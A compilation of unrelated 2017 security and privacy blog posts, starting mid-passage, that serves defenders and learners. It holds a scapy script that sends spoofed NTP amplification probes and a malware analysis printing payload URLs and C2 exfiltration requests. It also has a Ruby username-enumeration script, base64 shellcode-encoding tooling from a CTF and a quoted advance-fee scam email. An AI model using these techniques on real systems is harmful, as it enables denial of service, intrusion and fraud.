  • The driver must fundamentally be able to determine the sharing and use of his driving data (data sovereignty).

The guidelines also provide that business models based on using the data created by automated and connected cars must be circumscribed by the autonomy and data sovereignty of the drivers. The vehicle owners and users make decisions about the sharing and use of the data related to their driving. Data use practices currently prevalent with search engines and social networks should be counteracted early on.

The Report also discusses a wide range of additional questions associated with self-driving and connected cars, including the need to harmonize and balance the principle of data minimization with the demands of traffic safety, as well as competitiveness in the context of global business models for deriving value from data. The Report acknowledges the many interests in such data beyond traffic safety, such as state security interests and the commercial interests of the private sector. In that context, informational self-determination should not be understood solely for the purpose of personal privacy, but also as enabling decisions to share data.

Putative Data Breach Class Action Dismissed for the Third Time

On June 13, 2017, Judge Andrea R. Wood of the Northern District of Illinois dismissed with prejudice a putative consumer class action filed against Barnes & Noble. The case was first filed after Barnes & Noble’s September 2012 announcement that “skimmers” had tampered with PIN pad terminals in 63 of its stores and exposed payment card information. The court had previously dismissed the plaintiffs’ original complaint without prejudice for failure to establish Article III standing. After the Seventh Circuit’s decision in Remijas v. Neiman Marcus Group, the plaintiffs filed an almost identical amended complaint that alleged the same causes of action and virtually identical facts. Although the court found that the first amended complaint sufficiently alleged Article III standing, the plaintiffs nevertheless failed to plead a viable claim. The court therefore dismissed the first amended complaint under Rule 12(b)(6). 

The second amended complaint reduced both the number of plaintiffs and claims, advancing causes of action for breach of implied contract and various claims under Illinois’ and California’s consumer protection statutes. Plaintiffs added factual allegations of injuries stemming from emotional distress, loss of PII value, expended time spent with bank and police employees, used cell phone minutes, inability to use payment cards during the replacement period and the cost of credit monitoring services. The court found, however, that none of the alleged damages, including the cost of the credit monitoring services, were cognizable injuries under Rule 12(b)(6). Finding that further amendment would be futile, given the prior and ample amendment opportunities, the court dismissed the case with prejudice.

UK Government Confirms Implementation of EU GDPR

On June 21, 2017, in the Queen’s Speech to Parliament, the UK government confirmed its intention to press ahead with the implementation of the EU General Data Protection Regulation (“GDPR”) into national law. Among the announcements on both national and international politics, the Queen stated that, “A new law will ensure that the United Kingdom retains its world-class regime protecting personal data, and proposals for a new digital charter will be brought forward to ensure that the United Kingdom is the safest place to be online.” The statement confirms the priority given to data protection issues by the UK government. The UK government specifically confirmed that a new data protection bill will be brought forward to implement the EU GDPR and the EU Directive, which applies to law enforcement data processing. By doing so, the UK government intends to maintain the highest standards of data protection to ensure that data flows with EU Member States and other countries of the world will be maintained after Brexit. The Information Commissioner’s Office’s powers and available sanctions will also be increased.

NTP/SNMP amplification attacks

I needed to verify that an SNMP and NTP amplification vulnerability was actually working.

Metasploit has a few scanners for NTP vulns under auxiliary/scanner/ntp/ntp_*, and they will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[+] 1.1.1.1:123 - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification


I've largely not paid attention to these types of attacks in the past, but in this case I needed to validate that I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up two boxes to run the attack: an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes...listening for UDP packets) and it was receiving no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP but not the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP 2.2.2.2
SRCIP => 2.2.2.2
msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[*] Sending 1 packet(s) to 1.1.1.1 from 2.2.2.2

To rule out a Metasploit-specific issue, I also worked thru the attack with scapy, following the examples here:
http://www.nothink.org/misc/snmp_reflected.php
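
For reference, a minimal scapy sketch of the same spoofed probe looks roughly like this (1.1.1.1 and 2.2.2.2 stand in for the vulnerable server and the spoofed victim, as in the Metasploit output above; it must run as root, and as discussed below it only works if your network permits spoofed source addresses):

# Spoofed NTP mode 6 READVAR probe, roughly equivalent to the ntp_readvar module above.
# 1.1.1.1 = host reported as vulnerable, 2.2.2.2 = spoofed victim address (placeholders).
from scapy.all import IP, UDP, Raw, send

NTP_SERVER = "1.1.1.1"
SPOOFED_SRC = "2.2.2.2"

# NTP control message: LI/VN/Mode byte 0x16 (version 2, mode 6), opcode 0x02 = READVAR,
# remaining header fields zeroed.
readvar_probe = b"\x16\x02" + b"\x00" * 10

packet = IP(src=SPOOFED_SRC, dst=NTP_SERVER) / UDP(sport=123, dport=123) / Raw(load=readvar_probe)
send(packet, verbose=False)
# Any amplified reply goes to SPOOFED_SRC, so run tcpdump there (udp port 123) to confirm.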

So I asked on Twitter...fucking mistake...after getting past the trolls and well-intentioned people who didn't think I understood basic networking/spoofing at all (heart u), I was pointed to link #1 and link #2 as the likely reason I couldn't spoof the IP, as well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later, I found https://spoofer.caida.org/recent_tests.php, which lets you check whether a particular ASN supports spoofing, along with stats showing that only about 20% of the Internet allows spoofing.

source: https://spoofer.caida.org/summary.php

Checking common ISP and cloud provider ASNs showed that most don't permit spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.


P.S.
Someone asked if the vuln host was receiving the traffic. I couldn't answer for the initial host, but to satisfy my curiosity on the issue I built a vulnerable NTP server, and it did NOT receive the spoofed traffic even with hosts from the same VPS provider in the same data center (different subnets).

Hack Naked News #130 – June 20, 2017

Hacking military phone systems, IoT malware activity doubles, more WikiLeaks dumps, decade-old Linux bugs, and more. Jason Wood of Paladin Security joins us to discuss the erosion of ISP privacy rules on this episode of Hack Naked News!
Full Show Notes: https://wiki.securityweekly.com/HNNEpisode130
Visit https://www.securityweekly.com for all the latest episodes!

Who falls for this?

Sometimes a spammer hits my inbox with something so amusing I feel like I have to share. Check this one out. I can't tell you the last time I received something with such bad grammar, trying so hard to sound official yet catastrophically failing.

Anyway, I think you'll enjoy this one as much as I did.

/---------------------
Federal Bureau of Investigation (FBI)
Anti-Terrorist And Monitory Crime Division.
Federal Bureau Of Investigation.
J.Edgar.Hoover Building Washington Dc
Customers Service Hours / Monday To Saturday
Office Hours Monday To Saturday:
 
Dear Beneficiary,
 
Series of meetings have been held over the past 7 months with the secretary general of the United Nations Organization. This ended 3 days ago. It is obvious that you
 
have not received your fund which is to the tune of $16.5million due to past corrupt Governmental Officials who almost held the fund to themselves for their selfish
 
reason and some individuals who have taken advantage of your fund all in an attempt to swindle your fund which has led to so many losses from your end and unnecessary
 
delay in the receipt of your fund.for more information do get back to us.
 
The National Central Bureau of Interpol enhanced by the United Nations and Federal Bureau of Investigation have successfully passed a mandate to the current Prime
 
Minister of Cambodia Excellency Hun Sen to boost the exercise of clearing all foreign debts owed to you and other individuals and organizations who have been found not
 
to have receive their Contract Sum, Lottery/Gambling, Inheritance and the likes. Now how would you like to receive your payment? because we have two method of  payment
 
which is by Check or by ATM card?
 
ATM Card: We will be issuing you a custom pin based ATM card which you will use to withdraw up to $5,000 per day from any ATM machine that has the Master Card Logo on
 
it and the card have to be renewed in 4 years time which is 2022. Also with the ATM card you will be able to transfer your funds to your local bank account. The ATM
 
card comes with a handbook or manual to enlighten you about how to use it. Even if you do not have a bank account.
Check: To be deposited in your bank for it to be cleared within three working days. Your payment would be sent to you via any of your preferred option and would be
 
mailed to you via FedEx. Because we have signed a contract with FedEx which should expire 25th of June 2017 you will only need to pay $180 instead of $420 saving
 
you $240 so if you
Pay before the one week you save $240 note that any one asking you for some kind of money above the usual fee is definitely a fraudsters and you will have to stop
 
communication with every other person if you have been in contact with any. Also remember that all you will ever have to spend is $180.00 nothing more! Nothing less!
 
And we guarantee the receipt of your fund to be successfully delivered to you within the next 24hrs after the receipt of payment has been confirmed.
 
Note: Everything has been taken care of by the Government of Cambodia,The United Nation and also the FBI and including taxes, custom paper and clearance duty so all
 
you will ever need to pay is $180.
DO NOT SEND MONEY TO ANYONE UNTIL YOU READ THIS: The actual fees for shipping your ATM card is $420 but because FedEx have temporarily discontinued the C.O.D which
 
gives you the chance to pay when package is delivered for international shipping We had to sign contract with them for bulk shipping which makes the fees reduce from
 
the actual fee of $420 to $180 nothing more and no hidden fees of any sort!To effect the release of your fund valued at $16.5million you are advised to contact our
 
correspondent in Asia the delivery officer Miss.Chi Liko with the information below,
 
 
Tele:+855977558948
Email: chiliko7@e-mail.ua
 
You are adviced to contact her with the informations as stated below:
Your full Name..
Your Address:..............
Home/Cell Phone:..............
Preferred Payment Method ( ATM / Cashier Check )
 
 
Upon receipt of payment the delivery officer will ensure that your package is sent within 24 working hours. Because we are so sure of everything we are giving you a
 
100% money back guarantee if you do not receive payment/package within the next 24hrs after you have made the payment for shipping.
 
Yours sincerely,
 
Miss Donna Story
 
FEDERAL BUREAU OF INVESTIGATION
UNITED STATES DEPARTMENT OF JUSTICE
WASHINGTON, D.C. 20535
---------------------\

Enterprise Security Weekly #49 – 7 Layers

Paul and John discuss malware and endpoint defense. In the news, Carbon Black releases Cb Response 6.1, what to ask yourself before committing to a cybersecurity vendor, Malwarebytes replaces antivirus with endpoint protection, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode49
Visit https://www.securityweekly.com for all the latest episodes!

False Flag Attack on Multi Stage Delivery of Malware to Italian Organisations

Everything started with a well-crafted Italian-language email (given to me by a colleague of mine, thank you Luca!) that reached many Italian companies. The email had a weird attachment: ordine_065.js ("order form" in English), which appeared "quite malicious" to me.

By examining the .js attachment it becomes clear that it is not an "order form"; rather, it turns out to be a downloader. The following image shows the .JS content. Our reversing adventure begins here: we are facing the first stage of infection.

Stage 1: Downloader
The romantic dropper (code in the previous image) downloads and executes a PE file (let's call it the second stage) from 31.148.99.254. The IP address appears to be hosted by a Ukrainian telecommunications company that sells cloud services such as dedicated servers and colocation. The language used at this stage perfectly fits the language of the dropping website. Please keep this language in mind, since it becomes a nice find later on.

Listing http://31.148.99.254, we can appreciate a nice malware "implant" with multiple files in place, probably to serve multiple attack vectors (e.g., emails, tag inclusions, or script inclusion into benign HTML files). My first analysis was of obf.txt (the following image shows a small piece of it), which piqued my curiosity.

Lateral Analysis: obf.txt
That piece of VB code could be used to obfuscate VBScripts. Many pieces of code belonging to obf.txt are related to the Russian Script-Coding.com thread where dab00 published it in 2011. Another interesting file is Certificate.js, which shows the following code.

Lateral Analysis: Certificate.js
Quite an original technique to hide a JavaScript file! As you can see, the private and public keys are quoted, resulting in a valid .js file that a JS engine would happily interpret. Before getting into the real attack path represented by the set.tmp file from Stage 1 (ref. image Stage 1), I decided to perform some slow, intensive manual transformations in order to evaluate the result of GET "http://88.99.112.78/js/P8uph16W" (content in the following image). Certificate.js gets that data and evaluates it through the function eval(""+Cs+"").

Lateral Analysis: P8uph16W evaluated javascript
Once beautified it becomes easier to read:

Lateral  Analysis: Fresh IoC on Dropper 2
Now it's obvious that it tries to: (i) download stat.exe from third-party web sources, (ii) rename the downloaded file using Math.random().toString(36).substr(2, 9) + ".exe", and (iii) launch it using var VTmBaOw = new ActiveXObject("WScript.Shell");. This is super fun and interesting, but I am getting far away from my original attack path.

So, let's assume the downloaded files are the same (really they are not) and get back to our original Stage 1, where the romantic .JS dropper downloads the "set.tmp" file and executes it (please refer to image Stage 1: Downloader).

The dropped file is 00b42e2b18239585ed423e238705e501aa618dba, which evades sandboxes and antivirus engines. It is a PE file built from valid, compiled .NET source. Let's call it Stage 2, since it comes after Stage 1 ;). Decompiling this second stage, some "ambiguous and oriental characters" appear as the content of the "array" variable (please refer to the following code image).

Stage 2: Oriental Characters in array
By following those "interesting strings" ("interesting" meaning far away from the previously detected language), I landed on a reflective function that used .NET Assembly.Load() to dynamically load the binary form of the "array" variable and EntryPoint.Invoke() to dynamically run the binary. This is a well-known .NET technique exploiting the language's ability to introspect its own runtime.

Stage 2: Assembly.Load and EntryPoint.Invoke
  
In order to get the dynamically generated binary held in the "array" variable, I decided to patch the sample code. The following picture shows how the .NET code was patched: the control flow is simply forced to save the dynamically generated content to disk (the red breakpoint). In this specific case we are facing a third stage of infection, composed of an additional PE file (have a look in a hex editor for the 'MZ' string). Let's call it Stage 3.

Stage 3: Decrypted PE
In order to create Stage 3, Stage 2 needs to decrypt the binary translation of the "array" variable. Analysing the .NET code, it is not hard to figure out where Stage 2 decrypts Stage 3: the decryption loop is a simple XOR-based algorithm with a hardcoded key, as shown in the following image.

Stage 2: decryption key
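To make this concrete, here is a minimal Ruby sketch of that kind of XOR decryption loop. The key and file name below are placeholders made up for illustration, not the values hard-coded in the sample (which does this in .NET):

KEY = 'placeholder-key'.bytes   # stand-in key, NOT the one embedded in the malware

def xor_decrypt(data)
  # XOR every byte of the blob against the repeating key
  data.bytes.each_with_index.map { |b, i| b ^ KEY[i % KEY.length] }.pack('C*')
end

# 'array_dump.bin' stands in for the bytes recovered from the "array" variable
stage3 = xor_decrypt(File.binread('array_dump.bin'))
puts 'Decrypted blob starts with MZ (a PE file)' if stage3.start_with?('MZ')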
The newly decrypted stage (Stage 3) happens to be an interpreted PE file as well! It is built on Microsoft Visual Basic technology (remember the lateral analysis?) and is heavily obfuscated (maybe with obf.txt? ... of course!). The following image shows the Stage 3 structure.

Stage 3: Structure
The structure highlights three main modules:

1) Anti module. Its aim is to implement various evasion techniques that harden the sample against analysis and block execution on VMs.
2) Service module. Its aim is to launch a background service.
3) RunPe module. Its aim is to launch an additional encrypted PE file placed in the resource folder.

Let's investigate a little more closely what these modules do. The Anti module tries to figure out whether the analysed sample has landed in a controlled (emulated and/or simulated) environment, in order to change its behaviour. The following image shows some of the checks performed: the sample tries to identify Sandboxie, Fiddler and Wireshark so it can dynamically change its own behaviour.

Stage 3: evasion checks

The Service module tries to spawn a Windows service and to disable a number of Windows protections via registry values such as (but not limited to) EnableLUA, DisableCMD and DisableTaskMgr. The following image shows some of these actions.

Stage 3: Disabling Windows "Protections"
Finally, the RunPe module decrypts a further encrypted, embedded resource and tries to run it. The following images show the decryption loop followed by the decrypted payload.

Stage 3: Decryption Loop

Stage 3: decrypted payload

On line 253 of the decompiled code, Stage 3 decrypts the resource and executes it. In the above picture you can see the decrypted sequence 0x4D, 0x5A, 0x90, the header of yet another Windows PE. Let's call it Stage 4. This new stage appears to be a classic PE file written in C++, so we'll need a debugger to get into it. By analysing its dynamic behaviour (thanks to IDA Pro), it was easy to catch the dropped files and to understand how the sample uses them. The following image shows two dropped files (.nls and .bat) being saved to the hard drive by Stage 4.


Stage 4: dropping files (.nls and .bat)
The resulting .bat file tries to execute %1 with the parameter %2 (through cmd.exe /c), as shown in the next picture. If the file to be executed does not exist on disk, the batch file deletes the original file as well (i.e., itself).

Stage 4: file execution

%1 is an additional dropped PE file, while %2 is a "random" value (a key? a unique ID?).

Stage 4: Interesting "keys" passed to the .bat file.
Once the sample runs, it performs external requests such as the following, exfiltrating encrypted information:

GET /htue503dt/images/uAsMyeumP3uQ/LlAgNzHCWo8/XespJetlxPFFIY/VWK7lnAXnqTCYVX_2BL6O/vcjvx6b8nqcXQKN3/J6ga_2FN2zw6Dv6/r5EUJoPCeuwDIczvFL/kxAqCE1du/yzpHeaF3r0pY4KFUCyu0/jDoN_2BArkLgWaG/fFDxP.gif HTTP/1.1

POST /htue503dt/images/YtDKOb7fgj_2B10L/MN3zDY9V3IPW9vr/JSboSiHV4TAM_2BoCU/LocIRD_2B/MEDnB2QG_2Bf2dbtio8H/_2BLdLdN21RuRQj3xt2/SDWwjjE2JeHnPcsubnBWMG/NJUCRhlTnTa9c/5Dzpqg92/AypuGS6etix2MQvl1C8/V.bmp HTTP/1.1

Conclusions:
It is interesting to observe the complexity of this sample and how widely it is currently spread across Italian organisations. It is also interesting (at least from my personal point of view) how false-flag elements are used to confuse attribution, which is a huge technical issue these days. Unfortunately, with the information I have today it is not possible to attribute this attack: the dropper contains Russian strings, one of the payloads contains "oriental characters", and I am not able to say whether the attack is the result of a Russian-Chinese "joint venture", something hybrid, or code borrowed or acquired by one group from another. For sure, it is not what it appears to be :D !

Indicators of Compromise:
Here are some of the most interesting indicators of compromise.

http://88.99.112.78/
http://31.148.99.254/
http://mezzelune.com/arch/stat.exe
http://online.allscapelawnservices.com/arch/stat.exe
http://quotidianoannunci.it/arch/stat.exe
9b8251c21cf500dcb757f68b8dc4164ebbcbf6431282f0b0e114c415f8d84ad0
6456cd84f81b613e35b75ff47f4ccd4d83ec8634b5dcdf77f915fe7380106b28
5ab04878b630d1e0598fb6f74570f653a6bd0753dad9ef55ecf467bee7e618e1
4605dc8f1bc38075eacf526a1126636aa570fccbe78dca69781cc25edd1a1043
3fc092b52e6220713d2cb098c6d11a56575c241f
610df2672d7cae29e48118a27c4cb2a531e6399b
c304502aa7217399acc0162f41da00dc4add4105
magicians-blog.info
ozarkpatternconcrete.info
androidtutorials.info
executenet.pw
base.vuquoctrung.info/htue503dt
base.magicians-blog.info/htue503dt
base.ozarkpatternconcrete.info/htue503dt
base.androidtutorials.info/htue503dt
executenet.pw/htue503dt

Simple Username Harvesting (from SANS SEC542)

Go to a web site that requires a login. Put in any username with any password. Did the page come back with both the User and Password fields blank? Now put YOUR username in, but with some password you make up. Does the form come back with your username in the User field and nothing in the Password field? If so, here's what you just discovered. The developer is making his form more efficient by not hashing and testing the password to see if it's correct unless the username is valid. If the username IS valid, he populates the User field with it and checks the password. If the password is incorrect, he only clears the Password field so you can retry your password. You just discovered a crude form of username harvesting. Try different usernames and if they remain in the User field, that's a valid account on the server. I know, that would take a lot of time to do it that way. That's why hackers write automated tools.
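As a rough sketch of what such an automated tool might look like (in Ruby; the URL, form field names and the value= check are all assumptions you would adapt to the form you are authorized to test):

require 'net/http'
require 'uri'

# Hypothetical login form and field names -- adjust for the real target
uri = URI('https://example.com/login')
candidates = %w[admin alice bob charlie]

candidates.each do |user|
  res = Net::HTTP.post_form(uri, 'username' => user, 'password' => 'definitely-wrong')
  # If the form comes back with the User field repopulated, the account likely exists
  puts "[+] Likely valid account: #{user}" if res.body.include?(%(value="#{user}"))
end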

Belgian DPA Issues Recommendation on DPO Appointment under GDPR

Recently, the Belgian Privacy Commission (the “Belgian DPA”) released a Recommendation (in French and Dutch) regarding the requirement to appoint a data protection officer (“DPO”) under the EU General Data Protection Regulation (“GDPR”).

The Recommendation aims to provide guidance in response to the many questions that the Belgian DPA has received so far regarding the DPO function, in particular regarding the compatibility of the DPO function with other existing functions within a company (e.g., security officer, compliance officer, risk manager, human resources director, IT director).

According to the Belgian DPA, companies must assess such compatibility on a case-by-case basis in order to ensure compliance with the requirements of the GDPR and avoid potential conflicts of interest.

In its Recommendation, the Belgian DPA notes that security officers designated under the current Belgian data protection framework cannot automatically be designated as DPO under the GDPR.

In line with the GDPR and the revised guidelines of the Article 29 Working Party published in April 2017, the Recommendation outlines the role and tasks of the DPO under the GDPR, which include (1) monitoring compliance with the GDPR, (2) assistance with data protection impact assessments, (3) assistance with internal record-keeping obligations and (4) cooperation with data protection authorities. Further, the Belgian DPA recalls that companies that appoint a DPO must (1) consult the DPO for questions related to the protection of personal data, (2) provide the DPO with sufficient resources and (3) ensure that the DPO performs his or her role in an independent manner. The Belgian DPA further lists the qualifications a DPO must have in order to accomplish his or her goals.

The Belgian DPA also recommends that companies document the analysis made on the appointment of a DPO under the GDPR, as well as their final choice with respect to the appointment. It also notes the possibility for companies to appoint external DPOs.

Hack Naked News #129 – June 13, 2017

How to delete an entire company, GameStop suffers a breach, Macs do get viruses, Docker released LinuxKit, and more. Jason Wood of Paladin Security joins us to discuss the military beefing up their cybersecurity reserve on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode129

Visit http://www.securityweekly.com for all the latest episodes!

Solving b-64-b-tuff: writing base64 and alphanumeric shellcode

Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There's an easy solution - using an alphanumeric encoder - but what's the fun in that? (also, I didn't think of it :) ). I'm going to cover base64, but these exact same principles apply to alphanumeric - there's absolutely no reason you couldn't change the SET variable in my examples and generate alphanumeric shellcode.

In this post, we're going to write a base64 decoder stub by hand, which encodes some super simple shellcode. I'll also post a link to a tool I wrote to automate this.

I can't promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)

Intro to Shellcode

I don't want to dwell too much on the basics, so I highly recommend reading PRIMER.md, which is a primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge is that you send the server arbitrary binary data. That data would be encoded into base64, then the base64 string would be run as if it were machine code. That means that your machine code had to be made up of characters in the set [a-zA-Z0-9+/]. You could also have an equal sign ("=") or two on the end, but that's not really useful.

We're going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it'd be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the commandline, a tool that we'll see used throughout this blog, but I didn't keep that code. Instead, I'm going to use the Crabstone Disassembler, which is Ruby bindings for Capstone:

require 'crabstone'

# Our set of known characters
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

# Create an instance of the Crabstone Disassembler for 32-bit x86
cs = Crabstone::Disassembler.new(Crabstone::ARCH_X86, Crabstone::MODE_32)

# Get every 2-character combination
SET.chars.each do |c1|
  SET.chars.each do |c2|
    # Pad it out pretty far with obvious no-op-ish instructions
    data = c1 + c2 + ("A" * 14)

    # Disassemble it and get the first instruction (we only care about the
    # shortest instructions we can form)
    instruction = cs.disasm(data, 0)[0]

    puts "%s     %s %s" % [
      instruction.bytes.map() { |b| '%02x' % b }.join(' '),
      instruction.mnemonic.to_s,
      instruction.op_str.to_s
    ]
  end
end

I'd probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that's easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that's useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn't be useful, but that I didn't want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls ("int 0x80" in assembly or "\xcd\x80" in machine code; we'll see how that winds up being the most problematic piece!).

For the purposes of this blog, we're going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace.

Here's the shellcode we're going to be working with:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

We'll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles to (on Ubuntu, if this fails, try apt-get install nasm):

$ echo -e 'bits 32\n\nmov eax, 0x01\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file
[...]
read(3, "\270\1\0\0\0\273AAAA\315\200", 12) = 12
exit(1094795585)                        = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We're going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm -b32 file
00000000  B801000000        mov eax,0x1
00000005  BB41414141        mov ebx,0x41414141
0000000A  CD80              int 0x80

Easy stuff: NUL byte restrictions

Let's take a quick look at a simple character restriction: NUL bytes. It's commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It's usually pretty straightforward to get rid of NUL bytes by just looking at where they appear and fixing them; it's almost always the case that they're caused by 32-bit moves or values, so we can just switch to 8-bit moves (using eax is 32 bits; using al, the low byte of eax, is 8 bits):

xor eax, eax ; Set eax to 0
inc eax ; Increment eax (set it to 1) - could also use "mov al, 1", but that's one byte longer
mov ebx, 0x41414141 ; Set ebx to the usual value, no NUL bytes here
int 0x80 ; Perform the syscall

We can prove this works, as well (I'm going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e 'bits 32\n\nxor eax, eax\ninc eax\nmov ebx, 0x41414141\nint 0x80\n'> file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  31 c0 40 bb 41 41 41 41  cd 80                    |1.@.AAAA..|

Simple!

Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let's look at the disassembled version so we can see where the problems are:

$ ndisasm -b32 file
00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  BB41414141        mov ebx,0x41414141
00000008  CD80              int 0x80

Okay, maybe we aren't so close: the only line that's actually compatible is "inc eax". I guess we can start the long journey!

Let's start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

  • 35 ?? ?? ?? ?? xor eax,0x????????
  • 68 ?? ?? ?? ?? push dword 0x????????
  • 58 pop eax

Let's start with the most naive approach:

push 0
pop eax

If we assemble that, we get:

00000000  6A00              push byte +0x0
00000002  58                pop eax

Close! But because we're pushing 0, we end up with a NUL byte. So let's push something else:

push 0x41414141
pop eax

If we look at how that assembles, we get:

00000000  68 41 41 41 41 58                                 |hAAAAX|

Not only is it all Base64 compatible now, it also spells "hAAAAX", which is a fun coincidence. :)

The problem is, eax doesn't end up as 0, it's 0x41414141. You can verify this by adding "int 3" at the bottom, dumping a corefile, and loading it in gdb (feel free to use this trick throughout if you're following along; I'm using it constantly to verify my code snippets, but I'll only show it when the values are important):

$ ulimit -c unlimited
$ rm core
$ cat file.asm
bits 32

push 0x41414141
pop eax
int 3
$ nasm -o file file.asm
$ ./run_raw_code ./file
allocated 8 bytes of executable memory at: 0x41410000
fish: “./run_raw_code ./file” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Core was generated by `./run_raw_code ./file`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410008 in ?? ()
(gdb) print/x $eax
$1 = 0x41414141

Anyway, if we don't like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let's do that:

push 0x41414141
pop eax
xor eax, 0x41414141

Which assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41                 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let's look at why!

We'll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      if((b1 ^ b2) == b)
        return [b1, b2]
      end
    end
  end
  puts("Error: Couldn't encode 0x%02x!" % b)
  return nil
end

0.upto(255) do |i|
  puts("%x => %s" % [i, find_bytes(i)])
end

The full output is here, but the summary is:

0 => [65, 65]
1 => [66, 67]
2 => [65, 67]
3 => [65, 66]
...
7d => [68, 57]
7e => [70, 56]
7f => [70, 57]
Error: Couldn't encode 0x80!
80 =>
Error: Couldn't encode 0x81!
81 =>
Error: Couldn't encode 0x82!
82 =>
...

Basically, we can encode any value that doesn't have the most-significant bit set (ie, anything under 0x80): every character in our set is below 0x80, and xoring two bytes whose top bits are both clear can never produce a byte with its top bit set. That's going to be a problem that we'll deal with much, much later.

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32(desired)
  # Convert the integer into a string (pack()), then into the four bytes
  b1, b2, b3, b4 = [desired].pack('N').bytes()

  v1 = find_bytes(b1)
  v2 = find_bytes(b2)
  v3 = find_bytes(b3)
  v4 = find_bytes(b4)

  # Convert both sets of xor values back into integers
  result = [
    [v1[0], v2[0], v3[0], v4[0]].pack('cccc').unpack('N').pop(),
    [v1[1], v2[1], v3[1], v4[1]].pack('cccc').unpack('N').pop(),
  ]


  # Note: I comment these out for many of the examples, simply for brevity
  puts '0x%08x' % result[0]
  puts '0x%08x' % result[1]
  puts('----------')
  puts('0x%08x' % (result[0] ^ result[1]))
  puts()

  return result
end

This function takes a single 32-bit value and it outputs the two xor values (note that this won't work when the most significant bit is set.. stay tuned for that!):

irb(main):039:0> get_xor_values_32(0x01020304)
0x42414141
0x43434245
----------
0x01020304

=> [1111572801, 1128481349]

irb(main):040:0> get_xor_values_32(0x41414141)
0x6a6a6a6a
0x2b2b2b2b
----------
0x41414141

=> [1785358954, 724249387]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:

get_xor_values_32(0x01)
0x41414142
0x41414143
----------
0x00000001

=> [1094795586, 1094795587]

Then write the shellcode:

push 0x41414142
pop eax
xor eax, 0x41414143

And prove to ourselves that it's base-64-compatible; I believe in doing this, because every once in a while an instruction like "inc eax" (which becomes '@') will slip in when I'm not paying attention:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41                 |hBAAAX5CAAA|

